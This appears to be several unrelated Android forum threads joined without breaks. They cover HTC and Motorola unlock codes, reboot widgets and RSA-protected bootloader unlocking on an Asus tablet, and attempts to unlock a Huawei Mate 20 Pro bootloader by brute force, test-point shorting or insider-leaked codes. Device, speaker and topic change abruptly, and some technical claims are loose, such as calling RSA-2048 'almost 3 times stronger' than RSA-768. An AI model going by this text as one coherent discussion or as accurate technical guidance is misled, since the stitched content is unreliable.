ECEXCURSION said:
I suppose you can't change something like that?
Sent from my HTC One X
Click to expand...
Click to collapse
No sir.. the unlock code is unique to each device :-\
Sent from my GT-P3113 using xda premium
I've proposed this several times in the last week or so and nobody has paid attention. I've yet to hear somebody say, for certain, what the unlock code is based on and I'm sure that we haven't fully investigated whether the code is really unique or whether that's just what we have been led to believe.
What we should do is start making a table of numbers (IMEIs, Device ID Tokens, Serial Numbers, Unlock Codes, etc) to see if a pattern emerges. Even if it is based on IMEI numbers, if we figure out how the number is arrived at (could it be as easy as md5(IMEI) or something???), we may be able to bypass HTCDev.
Billy
If I was a betting man I'd say the code is heavily encrypted.
Maybe HTC made it simple and easy for us to crack on purpose because they embrace the android community and despise AT&T as much as we do... Never know till you try.
Sent from my HTC One X
One idea that I've had bouncing around is using the onboard storage as a virtual goldcard. Use it to load a phone image that has unlocked bootloader. I have no idea if such a thing is even possible
gunnyman said:
One idea that I've had bouncing around is using the onboard storage as a virtual goldcard. Use it to load a phone image that has unlocked bootloader. I have no idea if such a thing is even possible
Click to expand...
Click to collapse
But the gold card needs to be separate from the actual storage and be able to be mounted and unmounted at will like a true gold card I would think]
gunnyman said:
If I was a betting man I'd say the code is heavily encrypted.
Click to expand...
Click to collapse
Depending on how they encrypted it... it might not be so hard to work around though.
That said - it's probably public key encryption, with the phone having one half of it.
We really should get a couple examples of the inputs and outputs of HTCDev to look at though - you never know! People smarter than me may be able to deduce a pattern.
Hi,
I am new to tablets so maybe I am shooting in the complete darkness...
Why isn't it possible to reboot TF700?
Even with root (Tasker) the reboot action is disabled.
Is that related to kernel or something else?
Is it achievable without new custom ROM?
Thanks!
If you are rooted you can. In that case, you can try RebootMenu from the Play Store (and in there are several more options to choose from as there are more apps that perform this particular trick).
EDIT: just search for "reboor widget" in the play store, and the one you find from fadroid is prety nice as well. Used it before (as many of the others).
Hi,
thanks for the tip.
Is there a way to have a reboot options inside the menu when the power button is long pressed?
I think this is cyanogen way, but i am not sure...
Not that I've found so far -- I know what you mean, as my SGS2 does that when long-pressing the power button. This would be something a custom ROM might be able to provide.
MartyHulskemper said:
Not that I've found so far -- I know what you mean, as my SGS2 does that when long-pressing the power button. This would be something a custom ROM might be able to provide.
Click to expand...
Click to collapse
I know on my Bionic I hate going back to stock because I miss that reboot button.
Found a great solution!
Download: Elixir2
Create: status bar widget (or home screen) with reboot toggle.
It show menu with reboot, recovery etc.
Not exactly same thing as with power button (where i also like the fact that it all looks native ICS), but still a very nice solution. :cyclops:
Svashtar said:
Found a great solution!
Download: Elixir2
Create: status bar widget (or home screen) with reboot toggle.
It show menu with reboot, recovery etc.
Not exactly same thing as with power button (where i also like the fact that it all looks native ICS), but still a very nice solution. :cyclops:
Click to expand...
Click to collapse
I can't wait to get CM10 running on this thing lol. It looked great for the early stages on the Prime.
I just open Terminal Emulator and enter the "reboot" command, but then again I sometimes have "values not saved" or sth like that from No-frills CPU (which is actually bogus, as there was nothing to save, it still has the same things to load - governor & scheduler, doesn't reset the settings or anything, so probably some precaution measures in the code)
d14b0ll0s said:
I just open Terminal Emulator and enter the "reboot" command, but then again I sometimes have "values not saved" or sth like that from No-frills CPU (which is actually bogus, as there was nothing to save, it still has the same things to load - governor & scheduler, doesn't reset the settings or anything, so probably some precaution measures in the code)
Click to expand...
Click to collapse
Not quite as nice as hitting a button to do it lol. I think that turning off the device then turning back on might be faster than finding terminal emulator. I'm sure that's similar to what the actual widgets and such do.
KilerG said:
Not quite as nice as hitting a button to do it lol. I think that turning off the device then turning back on might be faster than finding terminal emulator. I'm sure that's similar to what the actual widgets and such do.
Click to expand...
Click to collapse
Depends on the point of view ;> I find using the term fun. And it's always on my main screen, so no problems finding it really!
KilerG said:
I can't wait to get CM10 running on this thing lol. It looked great for the early stages on the Prime.
Click to expand...
Click to collapse
Yeah, me too, CM10 is going to kick ass to my Infinity as soon as its available
But, I think more important right now is to unlock the bootloader - as soon as possible - we just have to wait for Asus on this one, which sucks a bit. How long did it take for Prime and other transformer line products to receive an unlocker?
TF300 got it very quickly (less than a month since original release I think)
Sent from my ASUS Transformer Pad TF700T using xda app-developers app
d14b0ll0s said:
TF300 got it very quickly (less than a month since original release I think)
Sent from my ASUS Transformer Pad TF700T using xda app-developers app
Click to expand...
Click to collapse
Ughhhhh... damn -- how long can "a little less than a month" feel?
MartyHulskemper said:
Ughhhhh... damn -- how long can "a little less than a month" feel?
Click to expand...
Click to collapse
It can be Infinity, I guess.
Someone try and find an exploit based on the prime's unlock, but waiting is so much easier
Sent from my SAMSUNG-SGH-I727 using xda app-developers app
Svashtar said:
Yeah, me too, CM10 is going to kick ass to my Infinity as soon as its available
But, I think more important right now is to unlock the bootloader - as soon as possible - we just have to wait for Asus on this one, which sucks a bit. How long did it take for Prime and other transformer line products to receive an unlocker?
Click to expand...
Click to collapse
Not sure about the Prime, but my TF300 got unlocked about a month to a month and a half after release. I think it was released at the end of April (in the US), and the unlocker was released either in the middle of May or the end of that month. It was a long wait even though it actually wasn't that much time.
tpmullan said:
Someone try and find an exploit based on the prime's unlock, but waiting is so much easier
Sent from my SAMSUNG-SGH-I727 using xda app-developers app
Click to expand...
Click to collapse
Not possible. Devs have been trying to crack the Asus unlocker app for months. Asus' encryption is RSA-2,048 (that means the key is 2,048 bits long), which is almost completely unbreakable without a supercomputer to perform a ton of calculations. Even the NSA can't crack it efficiently.
For example (I researched RSA-2048 as I wrote this post), the most complex RSA encryption to be cracked thus far is RSA-768. The team that cracked it estimated that a 2.2GHz AMD Opteron with 2GB of RAM would need 1,500 YEARS to do the math required to break RSA-768 encryption.
Can you imagine how long it would take to break encryption that's almost 3 times stronger than that? Unless someone can come up with an insane algorithm to factor 2,048 bit numbers or you know a developer with a supercomputer laying around, no one's about to crack Asus' bootloader any time soon.
Edit: I should have paid more attention to the article. The team of crackers estimate that the desktop I referenced earlier would take "4,294,967,296 x 1.5 million years" to crack RSA-2,048 encryption. As terrible as a 2.2GHz Opteron is these days, I wouldn't expect much better from a top-of-the-line modern computer.
I don't think we have that much time, even with the Infinity.
EndlessDissent said:
...the desktop I referenced earlier would take "4,294,967,296 x 1.5 million years" to crack RSA-2,048 encryption. As terrible as a 2.2GHz Opteron is these days, I wouldn't expect much better from a top-of-the-line modern computer.
Click to expand...
Click to collapse
No, even with a crapload of vitamins and healthy living to the max I won't make it that far (neither would I wish to). Oh, well, a month's waiting isn't that bleak when seen in this bit of context.
EndlessDissent said:
Not sure about the Prime, but my TF300 got unlocked about a month to a month and a half after release. I think it was released at the end of April (in the US), and the unlocker was released either in the middle of May or the end of that month. It was a long wait even though it actually wasn't that much time.
Not possible. Devs have been trying to crack the Asus unlocker app for months. Asus' encryption is RSA-2,048 (that means the key is 2,048 bits long), which is almost completely unbreakable without a supercomputer to perform a ton of calculations. Even the NSA can't crack it efficiently.
For example (I researched RSA-2048 as I wrote this post), the most complex RSA encryption to be cracked thus far is RSA-768. The team that cracked it estimated that a 2.2GHz AMD Opteron with 2GB of RAM would need 1,500 YEARS to do the math required to break RSA-768 encryption.
Can you imagine how long it would take to break encryption that's almost 3 times stronger than that? Unless someone can come up with an insane algorithm to factor 2,048 bit numbers or you know a developer with a supercomputer laying around, no one's about to crack Asus' bootloader any time soon.
Edit: I should have paid more attention to the article. The team of crackers estimate that the desktop I referenced earlier would take "4,294,967,296 x 1.5 million years" to crack RSA-2,048 encryption. As terrible as a 2.2GHz Opteron is these days, I wouldn't expect much better from a top-of-the-line modern computer.
Click to expand...
Click to collapse
I don't know if this applies to the infinity but there are other ways of cracking this stuff. For my evo 3d, the boot loader unlock method involved intentionally bricking the device to access a hidden sort of mode where the partitions could be rewritten. If I remember correctly, that bootloader was also encrypted.
Sent from my 3d porn machine.
jdeoxys said:
I don't know if this applies to the infinity but there are other ways of cracking this stuff. For my evo 3d, the boot loader unlock method involved intentionally bricking the device to access a hidden sort of mode where the partitions could be rewritten. If I remember correctly, that bootloader was also encrypted.
Sent from my 3d porn machine.
Click to expand...
Click to collapse
Failing that, if we got root we could probably try the 2nd init trick used on locked down Motorola phones, where immediately after the bootloader loads a rooted Asus firmware, the trick unloads everything but the kernel and starts loading your custom rom. The only flaw with the approach is you're still locked into using Asus's kernel, but otherwise you're free.
That said, with an official unlock I cant imagine there'd be a ton of demand or developer interest in such a solution.
I bought the phone from Amazon.co.uk.
Do you do that on the website, motorola.com/unlockbootloader?
It seems that when you copy paste the string from the shell into the website form it will create an empty space. The website does not accept that.
Cheers,
Nicole
poipoi01 said:
I bought the phone from Amazon.co.uk.
Click to expand...
Click to collapse
When you copy the unlock data code into the Motorola website go through it and delete all spaces at the end the beginning and anywhere else in between,even if you can't see a space at the beggining of the code move the cursor to before the first number or letter and press delete anyway.
Code
I had problems getting my unlock code also, there is gaps in the code that need to be removed,
it says not eligible took me about 5+ trys but got it in the end.
aradalien said:
I had problems getting my unlock code also, there is gaps in the code that need to be removed,
it says not eligible took me about 5+ trys but got it in the end.
Click to expand...
Click to collapse
Exactly what I said, delete all spaces
Quad check everything, its actually quite hard lol
Took me like 5 tries
Sent from my XT1032 using xda app-developers app
I'm going to start this by saying that I believe I have the ability to unlock the bootloader. There's a script that (in theory) allows you to bruteforce the unlock code. You do have to downgrade to EMUI 9.1 using HiSuite though that is at least possible even if you're currently on 10.1 like I am. Multiple downgrades is required.
While this is going on, I have gone ahead and created a Github repository under the username sackmaniac for my device (LYA-L09, 128GB storage, I have given codename as rickastley and I promise that isn't a joke) so assistance with what needs to be in the repository would also be appreciated. I'm quite new to this. LINK
Eventual goal to me personally is a LineageOS build.
Preparation for device rickastley:
1. Downgrade to EMUI 9.1.
2. Use programminghoch10 / SkyEmie bruteforce method. Expect it to take a long time LINK
3. There's a TWRP build somewhere on the Internet, I'm on mobile right now so cannot currently find the link.
4. Extract proprietary blobs. Someone will need to tell me how to do this on a stock ROM because that's I have.
5. The actual process of building whatever is needed.
Hint - there's OpenKirin for our device
OpenKirin
openkirin.net
Builds on AEX/LOS. Developers however refuse to share any details of internal components (sketchy). EMUI 10.1 might be also containing new drivers for certain phone features for new android version compatibly, and possibly cannot be extracted on non-rooted phone. (no root - no way to get it out), so that sadly makes EMUI 9/9.1 the only driver source.
A lineage os stable build for emui 9.1 would still be awesome !!!
dimon222 said:
Hint - there's OpenKirin for our device
OpenKirin
openkirin.net
Builds on AEX/LOS. Developers however refuse to share any details of internal components (sketchy). EMUI 10.1 might be also containing new drivers for certain phone features for new android version compatibly, and possibly cannot be extracted on non-rooted phone. (no root - no way to get it out), so that sadly makes EMUI 9/9.1 the only driver source.
Click to expand...
Click to collapse
That's a shame. Still though, having no luck with the bootloader unlock either so we can't even try this
flyl0 said:
A lineage os stable build for emui 9.1 would still be awesome !!!
Click to expand...
Click to collapse
Yeah... Bruteforce tool isn't going to happen. Any ideas?
K14_Deploy said:
Yeah... Bruteforce tool isn't going to happen. Any ideas?
Click to expand...
Click to collapse
No there is no way that I know to have a bootloader unlock code now, but I got my code here by an xda member back in the days.
flyl0 said:
No there is no way that I know to have a bootloader unlock code now, but I got my code here by an xda member back in the days.
Click to expand...
Click to collapse
I heard Huawei disabled the unlock command on 10.1, so I rolled back to 9.1. Can you please put me in contact with this person?
K14_Deploy said:
I heard Huawei disabled the unlock command on 10.1, so I rolled back to 9.1. Can you please put me in contact with this person?
Click to expand...
Click to collapse
It was 2 years ago I believe now, I do not remember who it is and I think that it is no longer possible to have codes even through this person, He gave it to me for free and I just sent my imei.
flyl0 said:
It was 2 years ago I believe now, I do not remember who it is and I think that it is no longer possible to have codes even through this person
Click to expand...
Click to collapse
Thanks anyway. Btw if this person is watching this thread, @ me.
All unlock codes were going from centralized technical database on Huawei side. Huawei did shutdown it, but opened it rarely for unknown reason (perhaps, someone had to fix something?). Database is down for long time now, it might never come back online. I would suggest to forget about this option altogether.
Instead, consider A/B Android builds for different experience of non-Huawei OS. Tho, I'm not sure how realistic it is on this device. (Haven't bothered trying)
dimon222 said:
All unlock codes were going from centralized technical database on Huawei side. Huawei did shutdown it, but opened it rarely for unknown reason (perhaps, someone had to fix something?). Database is down for long time now, it might never come back online. I would suggest to forget about this option altogether.
Instead, consider A/B Android builds for different experience of non-Huawei OS. Tho, I'm not sure how realistic it is on this device. (Haven't bothered trying)
Click to expand...
Click to collapse
This database... Was it made public? Is there an internet archive somewhere?
A/B is a non starter, Huawei devices barely support Treble. It seems like bootloader is the only option, however it would be nice if it's easy for anyone who wants to be able to unlock their bootloader. Mostly from a right to repair standpoint.
K14_Deploy said:
This database... Was it made public? Is there an internet archive somewhere?
A/B is a non starter, Huawei devices barely support Treble.
Click to expand...
Click to collapse
No. It was only accessible by technical personnel of Huawei (I guess that's who was leaking those codes afterall... Some insider). And it worked more like "enter IMEI" and wait 25 minutes to get unlock code back. Not a simple search/exportable database. Afterall, IMEI leaking might be problematic for such bases.
dimon222 said:
No. It was only accessible by technical personnel of Huawei (I guess that's who was leaking those codes afterall... Some insider). And it worked more like "enter IMEI" and wait 25 minutes to get unlock code back. Not a simple search/exportable database. Afterall, IMEI leaking might be problematic for such bases.
Click to expand...
Click to collapse
Makes sense.
K14_Deploy said:
Makes sense.
Click to expand...
Click to collapse
Theoretically if you're good with such kind of things, you could try with testpoint, however, I have no idea where it will lead.
This is where its located on our device (expand spoiler on + sign)
Huawei Mate 20 Pro - Прошивки - 4PDA
Huawei Mate 20 Pro - Прошивки
4pda.ru
dimon222 said:
Theoretically if you're good with such kind of things, you could try with testpoint, however, I have no idea where it will lead.
This is where its located on our device (expand spoiler on + sign)
Huawei Mate 20 Pro - Прошивки - 4PDA
Huawei Mate 20 Pro - Прошивки
4pda.ru
Click to expand...
Click to collapse
I shall open Google translate and take a look. Thank you.
Edit: had a look. Its based off a paid service, would rather avoid them if possible but that is seeming less and less possible. I have contacted DC Unlocker to see if they can unlock our devices. I still don't think it should cost 4 EURO to look through a database but there you go.
K14_Deploy said:
I shall open Google translate and take a look. Thank you.
Edit: had a look. Its based off a paid service, would rather avoid them if possible but that is seeming less and less possible. I have contacted DC Unlocker to see if they can unlock our devices. I still don't think it should cost 4 EURO to look through a database but there you go.
Click to expand...
Click to collapse
Test point has nothing to do with DC unlocker. It's a way to physically shorten device to load engineering bootloader with potentially more permissions available. It's just DC unlocker and such tools previously had a way to read bootloader code directly via loopholes in devices with old firmwares. It's not longer the case for devices of past decade I believe. Test point is available, but what it leads to - is a question. At least it might be possible to dump everything from device, including potentially encrypted bootloader key.
Link above - don't read top post, look at last post in page that has attachment with test point location to be shortened.
dimon222 said:
Test point has nothing to do with DC unlocker. It's a way to physically shorten device to load engineering bootloader with potentially more permissions available. It's just DC unlocker and such tools previously had a way to read bootloader code directly via loopholes in devices with old firmwares. It's not longer the case for devices of past decade I believe. Test point is available, but what it leads to - is a question. At least it might be possible to dump everything from device, including potentially encrypted bootloader key.
Link above - don't read top post, look at last post in page that has attachment with test point location to be shortened.
Click to expand...
Click to collapse
Ah. That makes more sense. Obvious downside of this method (if I can read correctly) is needing to open the device up, which isn't exactly easy. Or if it's the engineering build, then that seems to only be for the dual sim device (I believe they have different firmwares, if that isn't true I shall try using DLOAD with it)
UPDATE: Posted a rant / open letter about this on the official Huawei forums, let's see how long until someone from Huawei deletes it.
Good to know!
Do you have a link to the post so we can follow the discussion there?
TheLostOne said:
Good to know!
Do you have a link to the post so we can follow the discussion there?
Click to expand...
Click to collapse
Here you go. Also to be clear, being reported for hate speech from this would be less than ideal.